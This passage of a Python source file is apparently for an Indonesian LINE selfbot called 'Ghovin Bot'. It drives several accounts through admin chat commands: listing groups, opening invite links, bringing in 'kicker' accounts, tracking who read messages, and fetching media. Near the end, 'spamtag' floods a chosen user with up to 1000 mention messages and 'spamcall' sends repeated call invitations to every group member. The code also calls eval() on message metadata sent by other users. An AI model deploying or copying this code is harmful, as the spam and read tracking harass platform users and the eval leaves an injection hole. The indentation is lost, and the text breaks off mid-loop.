ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendMessage(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
elif cmd == "fiendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getAllContactIds()
for i in gid:
G = cl.getContact(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.displayName+ "\n"
cl.sendMessage(msg.to,"╔══[ FRIEND LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Friends ]")
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
cl.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist2":
if msg._from in admin:
ma = ""
a = 0
gid = kk.getGroupIdsJoined()
for i in gid:
G = kk.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kk.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist3":
if msg._from in admin:
ma = ""
a = 0
gid = kc.getGroupIdsJoined()
for i in gid:
G = kc.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kc.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Closed")
elif cmd == "url grup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["ARfoto"][mid] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["ARfoto"][Amid] = True
ki.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot2up":
if msg._from in admin:
Setmain["ARfoto"][Bmid] = True
kk.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot3up":
if msg._from in admin:
Setmain["ARfoto"][Cmid] = True
kc.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot4up":
if msg._from in admin:
Setmain["ARfoto"][Zmid] = True
sw.sendText(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot3name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("botkicker: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sw.getProfile()
profile.displayName = string
sw.updateProfile(profile)
sw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "tagall" or text.lower() == "Nah":
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4,nm5,nm6,nm7, jml = [], [], [], [],[], [], [], len(nama)
if jml <= 20:
mentionMembers(msg.to, nama)
if jml > 20 and jml < 40:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, len(nama)-1):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
if jml > 40 and jml < 60:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, len(nama)-1):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
if jml > 60 and jml < 80:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, len(nama)-1):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
if jml > 80 and jml < 100:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, len(nama)-1):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
if jml > 100 and jml < 120:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, len(nama)-1):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
if jml > 120 and jml < 140:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, len(nama)-1):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
if jml > 140 and jml < 160:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, len(nama)-1):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"♣GHOVIN Bot♣\n\n"+ma+"\nTotal「%s」 Bots" %(str(len(Bots))))
elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"Ghovin admin\n\nSuper admin:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotal「%s」 Ghovin" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
d = d + 1
end = '\n'
md += str(d) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getGroup(group).name + "\n"
cl.sendMessage(msg.to,"♪GHOVINBOT♪ Protection\n\n❧PROTECT URL :\n"+ma+"\n❧PROTECT KICK :\n"+mb+"\n❧PROTECT JOIN :\n"+md+"\n❧PROTECT CANCEL:\n"+mc+"\nTotal「%s」Grup yg dijaga" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel))))
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
ki.sendMessage(msg.to,responsename1)
kk.sendMessage(msg.to,responsename2)
kc.sendMessage(msg.to,responsename3)
elif cmd == "invitebot":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Bmid,Cmid,Amid]
cl.inviteIntoGroup(msg.to, anggota)
kk.acceptGroupInvitation(msg.to)
kc.acceptGroupInvitation(msg.to)
ki.acceptGroupInvitation(msg.to)
except:
pass
elif cmd == "antijs stay":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = cl.getGroup(msg.to)
cl.inviteIntoGroup(msg.to, [Zmid])
cl.sendMessage(msg.to,"Grup 「"+str(ginfo.name)+"」 Aman Dari JS")
except:
pass
elif cmd == "/all":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == ".all":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ki.sendText(msg.to, "Bye bye fams "+str(G.name))
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
elif cmd == "byeme":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
cl.sendText(msg.to, "Bye bye fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
ki.sendMessage(i, "Silahkan admin invite atau masukan kembali")
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendMessage(to,"Berhasil keluar dari grup " +h)
elif cmd == "assist1":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "assist2":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kk.getGroup(msg.to)
G.preventedJoinByTicket = True
kk.updateGroup(G)
elif cmd == "assist3":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == "kicker join":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
G = sw.getGroup(msg.to)
G.preventedJoinByTicket = True
sw.updateGroup(G)
elif cmd == "kicker bye":
if msg._from in admin:
G = cl.getGroup(msg.to)
sw.leaveGroup(msg.to)
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
cl.sendMessage(msg.to, "★Ghovin Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
cl.sendMessage(msg.to, "Progres speed...")
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['ARreadPoint'][msg.to] = msg_id
Setmain['ARreadMember'][msg.to] = {}
cl.sendText(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
cl.sendText(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['ARreadPoint']:
if Setmain['ARreadMember'][msg.to] != {}:
aa = []
for x in Setmain['ARreadMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage1(msg)
except:
pass
try:
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
except:
pass
Setmain['ARreadPoint'][msg.to] = msg.id
Setmain['ARreadMember'][msg.to] = {}
else:
cl.sendText(msg.to, "User kosong...")
else:
cl.sendText(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cl.sendMessage(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
cl.sendMessage(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
else:
cl.sendMessage(msg.to, "Sudak tidak aktif")
#===========Hiburan============#
elif cmd.startswith("sholat: "):
if msg._from in admin:
sep = text.split(" ")
location = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apisholat.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if data[1] != "Subuh : " and data[2] != "Dzuhur : " and data[3] != "Ashar : " and data[4] != "Maghrib : " and data[5] != "Isha : ":
ret_ = "「Jadwal Sholat」"
ret_ += "\n❧Lokasi : " + data[0]
ret_ += "\n❧" + data[1]
ret_ += "\n❧" + data[2]
ret_ += "\n❧" + data[3]
ret_ += "\n❧" + data[4]
ret_ += "\n❧" + data[5]
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("cuaca: "):
if msg._from in admin:
separate = text.split(" ")
location = text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apicuaca.php?kota={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if "result" not in data:
ret_ = "「Status Cuaca」"
ret_ += "\n❧Lokasi : " + data[0].replace("Temperatur di kota ","")
ret_ += "\n❧Suhu : " + data[1].replace("Suhu : ","") + " C"
ret_ += "\n❧Kelembaban : " + data[2].replace("Kelembaban : ","") + " %"
ret_ += "\n❧Tekanan udara : " + data[3].replace("Tekanan udara : ","") + " HPa"
ret_ += "\n❧Kecepatan angin : " + data[4].replace("Kecepatan angin : ","") + " m/s"
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("lokasi: "):
if msg._from in admin:
separate = msg.text.split(" ")
location = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apiloc.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
if data[0] != "" and data[1] != "" and data[2] != "":
link = "https://www.google.co.id/maps/@{},{},15z".format(str(data[1]), str(data[2]))
ret_ = "「Info Lokasi」"
ret_ += "\n❧Location : " + data[0]
ret_ += "\n❧Google Maps : " + link
else:
ret_ = "[Details Location] Error : Location not found"
cl.sendMessage(msg.to,str(ret_))
elif cmd.startswith("lirik: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
songs = song[5]
lyric = songs.replace('ti:','Title - ')
lyric = lyric.replace('ar:','Artist - ')
lyric = lyric.replace('al:','Album - ')
removeString = "[1234567890.:]"
for char in removeString:
lyric = lyric.replace(char,'')
ret_ = "╔══[ Lyric ]"
ret_ += "\n╠ Nama lagu : {}".format(str(song[0]))
ret_ += "\n╠ Durasi : {}".format(str(song[1]))
ret_ += "\n╠ Link : {}".format(str(song[3]))
ret_ += "\n╚══[ Finish ]\n\nLirik nya :\n{}".format(str(lyric))
cl.sendText(msg.to, str(ret_))
except:
cl.sendText(to, "Lirik tidak ditemukan")
elif cmd.startswith("music: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
ret_ = "╔══[ Music ]"
ret_ += "\n╠ Nama lagu : {}".format(str(song[0]))
ret_ += "\n╠ Durasi : {}".format(str(song[1]))
ret_ += "\n╠ Link : {}".format(str(song[3]))
ret_ += "\n╚══[ Waiting Audio ]"
cl.sendText(msg.to, str(ret_))
cl.sendText(msg.to, "Mohon bersabar musicnya lagi di upload")
cl.sendAudioWithURL(msg.to, song[3])
except:
cl.sendText(to, "Musik tidak ditemukan")
elif cmd.startswith("gimage: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
url = "https://api.xeonwz.ga/api/image/google?q={}".format(urllib.parse.quote(search))
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get(url)
data = r.text
data = json.loads(data)
if data["data"] != []:
start = timeit.timeit()
items = data["data"]
path = random.choice(items)
a = items.index(path)
b = len(items)
cl.sendText(msg.to,"「Google Image」\nType : Search Image\nTime taken : %seconds" % (start))
cl.sendImageWithURL(msg.to, str(path))
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n❧Author : ' + str(vid.author)
durasi = '\n❧Duration : ' + str(vid.duration)
suka = '\n❧Likes : ' + str(vid.likes)
rating = '\n❧Rating : ' + str(vid.rating)
deskripsi = '\n❧Deskripsi : ' + str(vid.description)
cl.sendVideoWithURL(msg.to, me)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
for s in stream:
shi = bestaudio.url
me = best.url
vin = s.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n❧Author : ' + str(vid.author)
durasi = '\n❧Duration : ' + str(vid.duration)
suka = '\n❧Likes : ' + str(vid.likes)
rating = '\n❧Rating : ' + str(vid.rating)
deskripsi = '\n❧Deskripsi : ' + str(vid.description)
cl.sendImageWithURL(msg.to, me)
cl.sendAudioWithURL(msg.to, shi)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "❧Link : " + "https://www.instagram.com/" + instagram
text = "❧Name : "+namaIG+"\n❧Username : "+usernameIG+"\n❧Biography : "+bioIG+"\n❧Follower : "+followerIG+"\n❧Following : "+followIG+"\n❧Post : "+mediaIG+"\n❧Verified : "+verifIG+"\n❧Private : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendMessage(msg.to,"❧I N F O R M A S I ❧\n\n"+"❧Date Of Birth : "+lahir+"\n❧Age : "+usia+"\n❧Ultah : "+ultah+"\n❧Zodiak : "+zodiak)
elif cmd.startswith("jumlah: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["ARlimit"] = num
cl.sendText(msg.to,"Total Spamtag Diubah Menjadi " +strnum)
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
cl.sendText(msg.to,"Total Spamcall Diubah Menjadi " +strnum)
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["ARlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi 1000")
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
jmlh = int(wait["limit"])
cl.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
if jmlh <= 1000:
for x in range(jmlh):
try:
